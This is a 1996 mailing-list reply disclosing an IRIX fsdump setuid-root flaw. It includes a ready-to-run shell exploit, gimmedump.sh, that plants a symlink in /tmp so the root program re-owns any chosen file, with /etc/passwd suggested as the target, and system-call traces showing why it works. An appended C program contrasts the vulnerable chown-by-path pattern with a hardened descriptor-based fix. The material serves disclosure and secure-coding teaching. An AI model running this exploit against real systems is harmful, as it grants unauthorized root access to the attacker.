Re: Irix: more suid fun/exploits
Jaechul Choe (poison@cosmos.kaist.ac.kr), Tue, 3 Dec 1996 00:03:54 +0900
- In reply to: Yuri Volobuev: "Irix: more suid fun/exploits"
> ABSTRACT
>
> /var/rfindd/fsdump is owned by root, has suid bit set by default and has
> bugs. It allows local users to create zero-length files anywhere on the
> system. If the file already exists, content is lost. With little work, it
> can be converted to root compromise. 5.3 is affected, 6.2 doesn't seem to
> have it, at least not on a standard installation.
>

Exploiting fsdump just once, you can change the owner of any file to yourself.
Didn't you see that the program changes the owner of the .pag & .dir files to
the user running it? I found the bug several weeks ago and now post a lame
exploit script that was put aside. IRIX 6.2's fsdump was vulnerable also. Is it
safe from the zero-length .lock file creation?

-------)<--------------------------------------------------------)<-------
#!/bin/sh
# gimmedump.sh
#
# This exploits the serious vulnerability in IRIX's fsdump(1M) program
# and attempts to change the owner of an arbitrary file to yourself.
# (You know /etc/passwd is an excellent target.)
# Tested on both IRIX 5.3 and IRIX64 6.2
# I think this bug may be exploited on any version of IRIX machines
# currently running.
# Here are some system call traces on the program, which show what
# the problem is:
#
# 379mS getuid() = 1128 euid=0
# 379mS getuid() = 1128 euid=0
# 379mS getuid() = 1128 euid=0
# 379mS getgid() = 20 egid=20
# 379mS chdir(/usr/var/tmp/) OK
# 380mS chmod(gimme, 0644) errno = 2 (No such file or directory)
# 380mS chown(gimme, 1128, 20) errno = 2 (No such file or directory)
# 380mS chmod(fsdump.pag, 0644) OK
# 380mS chown(fsdump.pag, 1128, 20) OK
# 380mS chmod(fsdump.dir, 0644) OK
# 381mS chown(fsdump.dir, 1128, 20) OK
#
# 1996 10.23 Jaechul Choe, CS Dept. in KAIST, Republic of Korea
# poison@worak.kaist.ac.kr

PROG="`basename $0`"

if [ $# -ne 1 ]; then
	echo "Usage: $PROG <target>"
	exit 1
fi

if [ ! -f /var/rfindd/fsdump ]; then
	echo "fsdump doesn't exist! - exiting"
	exit 1
fi

# fsdump chdir()s into its temporary directory and then chmod()s and
# chown()s the fixed names fsdump.pag and fsdump.dir by path (see the trace
# above). Both calls follow symlinks, so a link planted under one of those
# names redirects the chown() to whatever file the link points at.
cd /tmp
ln -s "$1" fsdump.dir

echo "Be patient! It will take some time to run."
echo "If you can't really wait, strike Ctrl-Z and see to the target file.\n"
/var/rfindd/fsdump -Fgimme /
echo "\nDone. Here is the result."
ls -al "$1"

rm -f fsdump.dir fsdump.pag gimme
exit 0
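The fault the strace in the message above exposes is a setuid-root program calling chmod() and chown() by path on fixed filenames in a shared temporary directory; both calls follow symlinks, so whoever can plant a link under that name picks the file that gets re-owned. The following C program is an added example, not code from this post or from IRIX, that reproduces that weak pattern beside a hardened one: create the file yourself with O_CREAT|O_EXCL|O_NOFOLLOW (the open fails if anything, a symlink included, already holds the name), confirm through the descriptor that it is a regular file, and then use fchmod()/fchown() on the descriptor so the path is never consulted again. Every function and file name here is hypothetical, the scenario it builds under /tmp is constructed for the demonstration, and it assumes a modern POSIX system with O_NOFOLLOW and fchown(), not what IRIX 5.3 shipped. The larger fix for a setuid program is to not operate on a world-writable directory with root privileges at all, or to drop to the real uid before doing so.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Weak pattern (what the fsdump trace shows): fixed filename in a shared
 * directory, then chmod() and chown() by path. Both calls follow symlinks,
 * so a link planted under that name redirects them to any file the attacker
 * chooses. Returns 0 on success, -1 on failure with errno set. */
int weak_fixup(const char *dir, const char *name, uid_t uid, gid_t gid)
{
    char path[4096];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    if (chmod(path, 0644) != 0)
        return -1;
    return chown(path, uid, gid);
}

/* Hardened pattern: create the file with O_CREAT|O_EXCL|O_NOFOLLOW so that a
 * pre-planted symlink makes open() fail instead of being followed, check via
 * fstat() that the descriptor is a regular file, and change mode and owner
 * through the descriptor. Returns 0 on success, -1 with errno set. */
int safe_fixup(const char *dir, const char *name, uid_t uid, gid_t gid)
{
    char path[4096];
    struct stat st;
    int fd, saved;

    snprintf(path, sizeof path, "%s/%s", dir, name);
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* EEXIST when a link sits there */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        saved = (errno != 0) ? errno : EINVAL;
        close(fd);
        errno = saved;
        return -1;
    }
    if (fchmod(fd, 0644) != 0 || fchown(fd, uid, gid) != 0) {
        saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    close(fd);
    return 0;
}

/* Constructed scenario (hypothetical paths): a private temp dir holding a
 * "target" file of mode 0600 and a symlink named fsdump.dir pointing at it,
 * mimicking the link the script above plants. Returns 1 when the weak
 * version is redirected onto the target (its mode flips to 0644) and the
 * hardened version refuses the link, leaving the target at 0600; else 0. */
int demo(void)
{
    char dir[] = "/tmp/fsdumpdemo.XXXXXX";
    char target[4096], lnk[4096];
    struct stat st;
    int fd, weak_hit, safe_rc, safe_refused;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/fsdump.dir", dir);

    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(target, lnk) != 0) {
        if (fd >= 0) close(fd);
        unlink(target); rmdir(dir);
        return 0;
    }
    close(fd);

    /* The weak version follows fsdump.dir -> target and re-modes the target,
     * exactly as chown(fsdump.dir, 1128, 20) did in the trace. */
    weak_hit = weak_fixup(dir, "fsdump.dir", getuid(), getgid()) == 0
            && stat(target, &st) == 0 && (st.st_mode & 07777) == 0644;

    /* Reset the target, then show the hardened version refuses the link
     * (EEXIST from O_EXCL; ELOOP accepted in case O_NOFOLLOW fires first). */
    chmod(target, 0600);
    safe_rc = safe_fixup(dir, "fsdump.dir", getuid(), getgid());
    safe_refused = safe_rc == -1 && (errno == EEXIST || errno == ELOOP)
                && stat(target, &st) == 0 && (st.st_mode & 07777) == 0600;

    unlink(lnk); unlink(target); rmdir(dir);
    return weak_hit && safe_refused;
}

int main(void)
{
    int ok = demo();
    printf("weak pattern redirected, hardened pattern refused: %s\n",
           ok ? "yes" : "no");
    return ok ? 0 : 1;
}
```

Run it as an ordinary user: weak_fixup() succeeds and the planted link silently changes the target's mode, while safe_fixup() returns -1 on the very same path and the target is untouched. The chown-to-self in the weak call mirrors the trace (the program re-owns the file to the real uid/gid), which is precisely what the script turns against /etc/passwd.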